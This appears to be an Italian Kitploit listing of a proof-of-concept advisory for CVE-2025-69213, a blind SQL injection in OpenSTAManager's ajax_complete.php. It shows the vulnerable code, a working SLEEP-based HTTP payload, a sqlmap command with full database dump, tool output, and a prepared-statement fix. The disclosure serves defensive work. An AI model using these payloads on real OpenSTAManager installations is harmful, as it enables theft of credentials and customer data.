Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-69213 — Repository proof-of-concept per CVE-2025-69213, che dimostra una vulnerabilità di SQL injection nell'endpoint ajax_complete.php di OpenSTAManager con sfruttamento blind basato sul tempo e guida alla correzione. | Kitploit
Strumenti/GitHubGitHub/lukasz-rybak/cve-2025-69213
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSicurezza dei Database
GitHublukasz-rybak/cve-2025-69213

CVE-2025-69213

Repository proof-of-concept per CVE-2025-69213, che dimostra una vulnerabilità di SQL injection nell'endpoint ajax_complete.php di OpenSTAManager con sfruttamento blind basato sul tempo e guida alla correzione.

Vedi Repository
15 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-69213: OpenSTAManager ha una SQL Injection in ajax_complete.php (endpoint get_sedi)

Panoramica

CampoDettagli
ID CVECVE-2025-69213
GravitàALTA
AvvisoVisualizza Avviso
Scoperto daLukasz Rybak

Prodotti Affetti

  • devcode-it/openstamanager (versioni: <= 2.9.8)

Classificazione CWE

  • CWE-89: Neutralizzazione impropria di elementi speciali usati in un comando SQL ('SQL Injection')

Dettagli

Riepilogo

Una vulnerabilità di SQL Injection esiste nell'endpoint ajax_complete.php durante la gestione dell'operazione get_sedi. Un attaccante autenticato può iniettare codice SQL dannoso tramite il parametro idanagrafica, portando ad un accesso non autorizzato al database.

Prova di Concetto

Codice Vulnerabile

File: modules/anagrafiche/ajax/complete.php:28

root@kitploit:~
case 'get_sedi':
    $idanagrafica = get('idanagrafica');
    $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione 
          FROM an_sedi 
          WHERE idanagrafica='".$idanagrafica."' ...";
    $rs = $dbo->fetchArray($q);

Flusso dei Dati

  1. Sorgente: $_GET['idanagrafica'] → get('idanagrafica')
  2. Vulnerabilità: L'input utente viene concatenato direttamente nella query SQL con apici singoli
  3. Destinazione: $dbo->fetchArray($q) esegue la query dannosa

Exploit

PoC Manuale (Blind SQLi basato sul tempo):

root@kitploit:~
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
image

Sfruttamento con SQLMap:

root@kitploit:~
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump

Output di SQLMap:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
image

Impatto

  • Esfiltrazione dei dati: Estrazione completa del database inclusi credenziali utente, dati dei clienti, registri finanziari
  • Escalation dei privilegi: Modifica della tabella zz_users per ottenere accesso admin
  • Integrità dei dati: Modifica o eliminazione non autorizzata di record
  • Potenziale RCE: Tramite SELECT ... INTO OUTFILE se i permessi dei file lo consentono

Versioni Affette

  • OpenSTAManager: Verificato nell'ultima versione (a dicembre 2025)
  • Tutte le versioni che utilizzano questo endpoint sono probabilmente affette

Rimedio

Sostituire la concatenazione diretta con dichiarazioni preparate:

Prima:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

Dopo:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

Riferimenti

  • OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
  • CWE-89: Neutralizzazione impropria di elementi speciali usati in un comando SQL

Riconoscimenti

Scoperto da: Łukasz Rybak

Riferimenti

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69213
  • https://github.com/advisories/GHSA-w995-ff8h-rppg

Disclaimer

Questa CVE è stata divulgata in modo responsabile seguendo le pratiche coordinate di divulgazione delle vulnerabilità. Le informazioni fornite qui sono solo per scopi educativi e difensivi.

Scarica lo strumento